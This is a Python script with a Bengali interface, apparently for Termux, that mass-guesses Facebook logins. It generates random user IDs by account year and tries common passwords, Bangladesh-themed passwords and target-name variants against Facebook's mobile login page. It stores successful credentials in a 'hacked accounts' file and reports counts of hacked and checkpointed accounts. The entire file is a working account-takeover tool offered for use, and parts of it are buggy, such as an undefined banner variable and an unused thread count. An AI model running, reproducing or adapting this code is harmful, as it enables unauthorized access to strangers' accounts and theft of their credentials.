#!/usr/bin/env python3
# -*- coding: utf-8 -*-

"""
[+] Tool Name     : OLD-CLONER
[+] Author        : Arish Ahmed Tushar 
[+] Version       : v3.0
[+] Description   : Year & Quantity Based Facebook ID Cloner for Termux
"""

import requests
import mechanize
import random
import sys
import os
import json
import time
from datetime import datetime
from rich.console import Console
from rich.table import Table
from rich.progress import Progress, SpinnerColumn, BarColumn, TextColumn
from concurrent.futures import ThreadPoolExecutor

console = Console()

YOUR_NAME = "Tushar"

UA_LIST = [
    "Mozilla/5.0 (Linux; Android 10; SM-G975F) AppleWebKit/537.36",
    "Mozilla/5.0 (Linux; Android 11; Redmi Note 10) AppleWebKit/537.36",
    "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36",
    "Mozilla/5.0 (Linux; Android 13; OnePlus 11) AppleWebKit/537.36",
    "Mozilla/5.0 (Linux; Android 14; Xiaomi 14 Pro) AppleWebKit/537.36",
    "Mozilla/5.0 (Linux; Android 9; Huawei P30) AppleWebKit/537.36",
    "Mozilla/5.0 (Linux; Android 8.0; Samsung Galaxy S8) AppleWebKit/537.36",
    "Mozilla/5.0 (Linux; Android 7.1.2; Nokia 6.1) AppleWebKit/537.36",
]

def banner():
    os.system("clear" if os.name == "posix" else "cls")
    banner_text = f"""
    ╔══════════════════════════════════════════════╗
    ║           {TUSHAR} FB CLONER v3.0                ║
    ║       Year & Quantity Based Clone Tool          ║
    ╚══════════════════════════════════════════════╝
    """
    console.print(f"[bold cyan]{banner_text}[/bold cyan]")
    console.print(f"[bold green]{'─'*50}[/bold green]")

def generate_fb_ids(year, quantity):
    year_ranges = {
        2004: (100000000000000, 100000000500000),
        2005: (100000000500001, 100000001000000),
        2006: (100000001000001, 100000002000000),
        2007: (100000002000001, 100000003000000),
        2008: (100000003000001, 100000005000000),
        2009: (100000005000001, 100000008000000),
        2010: (100000008000001, 100000012000000),
        2011: (100000012000001, 100000018000000),
        2012: (100000018000001, 100000025000000),
        2013: (100000025000001, 100000035000000),
        2014: (100000035000001, 100000050000000),
        2015: (100000050000001, 100000070000000),
        2016: (100000070000001, 100000100000000),
        2017: (100000100000001, 100000150000000),
        2018: (100000150000001, 100000220000000),
        2019: (100000220000001, 100000320000000),
        2020: (100000320000001, 100000450000000),
        2021: (100000450000001, 100000600000000),
        2022: (100000600000001, 100000800000000),
        2023: (100000800000001, 100001000000000),
        2024: (100001000000001, 100001200000000),
        2025: (100001200000001, 100001500000000),
    }

    if year not in year_ranges:
        base = 100000000000000 + ((year - 2004) * 50000000)
        start_id = base
        end_id = base + 50000000
    else:
        start_id, end_id = year_ranges[year]

    total_possible = end_id - start_id

    if quantity > total_possible:
        console.print(f"[yellow][!] {quantity} টি আইডি সম্ভব না, সর্বোচ্চ {total_possible} টি নেওয়া হবে[/yellow]")
        quantity = total_possible

    console.print(f"\n[cyan][i] বছর {year} এর জন্য আইডি জেনারেট হচ্ছে...[/cyan]")

    generated = set()
    with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
        task = progress.add_task("[cyan]আইডি জেনারেট হচ্ছে...", total=quantity)
        while len(generated) < quantity:
            fb_id = random.randint(start_id, end_id)
            generated.add(str(fb_id))
            progress.update(task, completed=len(generated))

    ids = list(generated)
    random.shuffle(ids)
    return ids

def generate_password_list():
    passwords = [
        "123456", "12345678", "123456789", "1234567890",
        "password", "password123", "password1234",
        "admin", "admin123", "admin1234",
        "bangladesh", "bangladesh123",
        "facebook", "facebook123", "fb123",
        "iloveyou", "love", "love123",
        "hello", "hello123", "hi123",
        "fuckyou", "fuck", "fuck123",
        "123", "1234", "12345", "123456",
        "111111", "000000", "666666",
        "qwerty", "qwerty123", "abc123",
        "monkey", "dragon", "master",
        "sunshine", "princess", "football",
        "trustno1", "welcome",
        "login", "pass", "pass123",
        "1q2w3e", "1q2w3e4r", "qazwsx",
        "121212", "131313", "654321",
        "987654", "987654321", "147258",
        "bangla", "dhaka", "dhaka123",
        "bd123", "bangladesh1",
        "mahbub", "rafiq", "hasan",
        "rahman", "khan", "islam",
        "karim", "rahim", "jamal",
        "kamal", "arif", "sagor",
        "rifat", "siam", "fahim",
    ]
    years = ["2024", "2025", "2023", "2022", "2021", "2020"]
    for y in years:
        passwords.append(y)
        for base in ["bangladesh", "facebook", "admin", "password", "dhaka", "bd"]:
            passwords.append(base + y)
    random.shuffle(passwords)
    return list(set(passwords))

COOKIE_FILE = "hacked_accounts.json"

def save_hacked_account(id, password, year):
    data = []
    if os.path.exists(COOKIE_FILE):
        try:
            with open(COOKIE_FILE, "r") as f:
                data = json.load(f)
        except:
            data = []
    for acc in data:
        if acc["id"] == id:
            return
    entry = {"id": id, "password": password, "year": year, "time": datetime.now().strftime("%Y-%m-%d %H:%M:%S")}
    data.append(entry)
    with open(COOKIE_FILE, "w") as f:
        json.dump(data, f, indent=4)

def show_hacked_accounts():
    if not os.path.exists(COOKIE_FILE):
        console.print("[yellow][!] এখনো কোনো একাউন্ট হ্যাক হয়নি[/yellow]")
        return
    try:
        with open(COOKIE_FILE, "r") as f:
            data = json.load(f)
    except:
        console.print("[red][!] ফাইল পড়তে সমস্যা[/red]")
        return
    if not data:
        console.print("[yellow][!] এখনো কোনো একাউন্ট হ্যাক হয়নি[/yellow]")
        return
    table = Table(title=f"{YOUR_NAME} - হ্যাক করা একাউন্ট ({len(data)})")
    table.add_column("নং", style="cyan")
    table.add_column("আইডি", style="green")
    table.add_column("পাসওয়ার্ড", style="red")
    table.add_column("বছর", style="yellow")
    table.add_column("সময়", style="white")
    for i, acc in enumerate(data, 1):
        table.add_row(str(i), acc["id"], acc["password"], str(acc["year"]), acc["time"])
    console.print(table)

def check_facebook_login(uid, password):
    br = mechanize.Browser()
    br.set_handle_robots(False)
    br.set_handle_refresh(False)
    br.addheaders = [
        ("User-Agent", random.choice(UA_LIST)),
        ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
        ("Accept-Language", "en-US,en;q=0.5"),
        ("Referer", "https://mbasic.facebook.com/"),
    ]
    try:
        br.open("https://mbasic.facebook.com/login.php", timeout=10)
        br.select_form(nr=0)
        br.form["email"] = uid
        br.form["pass"] = password
        response = br.submit()
        content = response.read().decode("utf-8", errors="ignore")
        if "c_user" in content:
            return True
        elif "checkpoint" in response.geturl():
            return "checkpoint"
        else:
            return False
    except Exception:
        return False

def start_cloning(ids, passwords, year, thread_count=20):
    total_ids = len(ids)
    total_pass = len(passwords)
    console.print(f"\n[bold cyan]╔═══ ক্লোনিং শুরু ═══╗[/bold cyan]")
    console.print(f"[bold cyan]║[/bold cyan] মোট আইডি      : {total_ids}")
    console.print(f"[bold cyan]║[/bold cyan] মোট পাসওয়ার্ড : {total_pass}")
    console.print(f"[bold cyan]║[/bold cyan] বছর           : {year}")
    console.print(f"[bold cyan]╚════════════════════╝[/bold cyan]")
    hacked = 0
    checkpoint = 0
    failed = 0
    with Progress() as progress:
        task = progress.add_task("[cyan]ক্লোনিং চলছে...", total=total_ids)
        for uid in ids:
            found = False
            for pas in passwords:
                if found:
                    break
                try:
                    with ThreadPoolExecutor(max_workers=1) as executor:
                        result = executor.submit(check_facebook_login, uid, pas).result()
                    if result is True:
                        console.print(f"[bold green][✔] হ্যাকড![/bold green] ID: {uid} | Pass: {pas}")
                        save_hacked_account(uid, pas, year)
                        hacked += 1
                        found = True
                    elif result == "checkpoint":
                        console.print(f"[yellow][⚠] চেকপয়েন্ট[/yellow] ID: {uid} | Pass: {pas}")
                        save_hacked_account(uid, pas, year)
                        checkpoint += 1
                        found = True
                except:
                    continue
            if not found:
                failed += 1
            progress.update(task, advance=1)
            time.sleep(0.1)
    return hacked, checkpoint, failed

def show_report(hacked, checkpoint, failed, total_ids):
    console.print(f"\n[bold cyan]╔═══ ক্লোনিং রিপোর্ট ═══╗[/bold cyan]")
    console.print(f"[bold cyan]║[/bold cyan] মোট আইডি     : {total_ids}")
    console.print(f"[bold green]║[/bold green] সফল হ্যাক   : {hacked}")
    console.print(f"[bold yellow]║[/bold yellow] চেকপয়েন্ট  : {checkpoint}")
    console.print(f"[bold red]║[/bold red] ব্যর্থ       : {failed}")
    console.print(f"[bold cyan]╚═══════════════════════╝[/bold cyan]")
    report_file = f"report_{datetime.now().strftime('%Y%m%d_%H%M%S')}.txt"
    with open(report_file, "w") as f:
        f.write(f"{YOUR_NAME} CLONER REPORT\n")
        f.write(f"{'='*40}\n")
        f.write(f"Total IDs   : {total_ids}\n")
        f.write(f"Hacked      : {hacked}\n")
        f.write(f"CheckpoNAM : {checkpoint}\n")
        f.write(f"Failed      : {failed}\n")
    console.print(f"[green][+] রিপোর্ট সেভ করা হয়েছে: {report_file}[/green]")

def show_stats():
    if not os.path.exists(COOKIE_FILE):
        console.print("[yellow][!] এখনো কোনো ডাটা নেই[/yellow]")
        return
    try:
        with open(COOKIE_FILE, "r") as f:
            data = json.load(f)
    except:
        console.print("[red][!] ডাটা লোড করতে সমস্যা[/red]")
        return
    if not data:
        console.print("[yellow][!] এখনো কোনো ডাটা নেই[/yellow]")
        return
    console.print(f"\n[bold cyan]═══ {YOUR_NAME} CLONER স্ট্যাটিস্টিক্স ═══[/bold cyan]")
    console.print(f"[white]মোট হ্যাক করা একাউন্ট: {len(data)}[/white]")
    year_count = {}
    for acc in data:
        y = acc.get("year", "Unknown")
        year_count[y] = year_count.get(y, 0) + 1
    console.print(f"\n[bold yellow]বছর ভিত্তিক হিসাব:[/bold yellow]")
    for year, count in sorted(year_count.items()):
        console.print(f"   [cyan]{year}[/cyan] : {count} টি")
    console.print(f"\n[dim]সর্বশেষ হ্যাক: {data[-1]['time']}[/dim]")

def custom_password_list():
    console.print("\n[bold yellow]পাসওয়ার্ড অপশন:[/bold yellow]")
    console.print("[1] ডিফল্ট পাসওয়ার্ড লিস্ট (১০০+)")
    console.print("[2] নিজের পাসওয়ার্ড ফাইল দিন")
    console.print("[3] শুধু নাম ভিত্তিক")
    choice = console.input("\n[yellow]অপশন দিন (1-3): [/yellow]")
    if choice == "2":
        filename = console.input("[yellow]পাসওয়ার্ড ফাইলের নাম দিন: [/yellow]")
        if os.path.exists(filename):
            with open(filename, "r") as f:
                passwords = [line.strip() for line in f if line.strip()]
            console.print(f"[green][+] {len(passwords)} টি পাসওয়ার্ড লোড করা হয়েছে[/green]")
            return passwords
        else:
            console.print("[red][!] ফাইল নেই, ডিফল্ট ব্যবহার করা হবে[/red]")
            return generate_password_list()
    elif choice == "3":
        name = console.input("[yellow]টার্গেটের নাম দিন: [/yellow]")
        passwords = []
        base = name.lower()
        for suffix in ["", "123", "123456", "@123", "786", "1", "12", "2024", "2025"]:
            passwords.append(base + suffix)
            passwords.append(base.capitalize() + suffix)
        passwords.extend(["123456", "password", "bangladesh"])
        return list(set(passwords))
    else:
        return generate_password_list()

def main():
    banner()
    while True:
        console.print(f"\n[bold green]═══ {YOUR_NAME} CLONER মেনু ═══[/bold green]")
        console.print("[1] 🎯 আইডি ক্লোন শুরু করুন")
        console.print("[2] 📊 হ্যাক করা একাউন্ট লিস্ট")
        console.print("[3] 📈 স্ট্যাটিস্টিক্স")
        console.print("[4] 🗑️ সব ডাটা ক্লিয়ার")
        console.print("[0] 🚪 এক্সিট")
        choice = console.input(f"\n[bold green]{YOUR_NAME}[/bold green][white]@[/white][bold cyan]CLONER[/bold cyan] ~ [/bold]")
        
        if choice == "1":
            console.print(f"\n[bold cyan]═══ প্রথম ধাপ: বছর নির্বাচন ═══[/bold cyan]")
            console.print("[dim]উপলব্ধ বছর: 2004 থেকে 2025 পর্যন্ত[/dim]")
            try:
                year = int(console.input("[yellow]বছর দিন (যেমন: 2020): [/yellow]"))
                if year < 2004 or year > 2025:
                    console.print("[red][!] 2004 থেকে 2025 এর মধ্যে দিন[/red]")
                    continue
            except ValueError:
                console.print("[red][!] সঠিক সংখ্যা দিন[/red]")
                continue
            
            console.print(f"\n[bold cyan]═══ দ্বিতীয় ধাপ: সংখ্যা নির্বাচন ═══[/bold cyan]")
            console.print("[dim]উপলব্ধ সংখ্যা: 100, 500, 1000, 2000, 5000, 10000, 50000, 99999[/dim]")
            try:
                quantity = int(console.input("[yellow]কত পিস আইডি দরকার? (100-99999): [/yellow]"))
                if quantity < 1 or quantity > 99999:
                    console.print("[red][!] 1 থেকে 99999 এর মধ্যে দিন[/red]")
                    continue
            except ValueError:
                console.print("[red][!] সঠিক সংখ্যা দিন[/red]")
                continue
            
            passwords = custom_password_list()
            
            try:
                threads = int(console.input("[yellow]থ্রেড সংখ্যা (10-50, ডিফল্ট 20): [/yellow]") or "20")
                if threads < 1 or threads > 100:
                    threads = 20
            except:
                threads = 20
            
            console.print(f"\n[bold yellow]═══ কনফার্মেশন ═══[/bold yellow]")
            console.print(f"বছর      : {year}")
            console.print(f"আইডি সংখ্যা: {quantity}")
            console.print(f"পাসওয়ার্ড : {len(passwords)} টি")
            console.print(f"থ্রেড    : {threads}")
            
            confirm = console.input(f"\n[red]শুরু করবেন? (yes/no): [/red]").lower()
            if confirm != "yes":
                console.print("[yellow]বাতিল করা হয়েছে[/yellow]")
                continue
            
            ids = generate_fb_ids(year, quantity)
            hacked, checkpoint, failed = start_cloning(ids, passwords, year, threads)
            show_report(hacked, checkpoint, failed, len(ids))
            input(f"\n[dim]এন্টার চাপুন মেনুতে ফিরতে...[/dim]")
            banner()
        
        elif choice == "2":
            show_hacked_accounts()
            input(f"\n[dim]এন্টার চাপুন মেনুতে ফিরতে...[/dim]")
            banner()
        
        elif choice == "3":
            show_stats()
            input(f"\n[dim]এন্টার চাপুন মেনুতে ফিরতে...[/dim]")
            banner()
        
        elif choice == "4":
            confirm = console.input("[red]সব ডাটা ডিলিট করবেন? (yes/no): [/red]").lower()
            if confirm == "yes":
                if os.path.exists(COOKIE_FILE):
                    os.remove(COOKIE_FILE)
                    console.print("[green][+] সব ডাটা মুছে ফেলা হয়েছে[/green]")
                else:
                    console.print("[yellow][!] কোনো ডাটা নেই[/yellow]")
            input(f"\n[dim]এন্টার চাপুন...[/dim]")
            banner()
        
        elif choice == "0":
            console.print(f"[bold red][!] বের হচ্ছে...[/bold red]")
            console.print(f"[bold cyan]{YOUR_NAME} CLONER বন্ধ হচ্ছে. ধন্যবাদ![/bold cyan]")
            sys.exit(0)
        
        else:
            console.print("[red][!] ভুল অপশন. 0-4 এর মধ্যে দিন[/red]")

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        console.print(f"\n[bold red][!] KEYBOARD INTERRUPT[/bold red]")
        sys.exit(0)
    except Exception as e:
        console.print(f"[bold red][!] এরর: {e}[/bold red]")
        sys.exit(1)
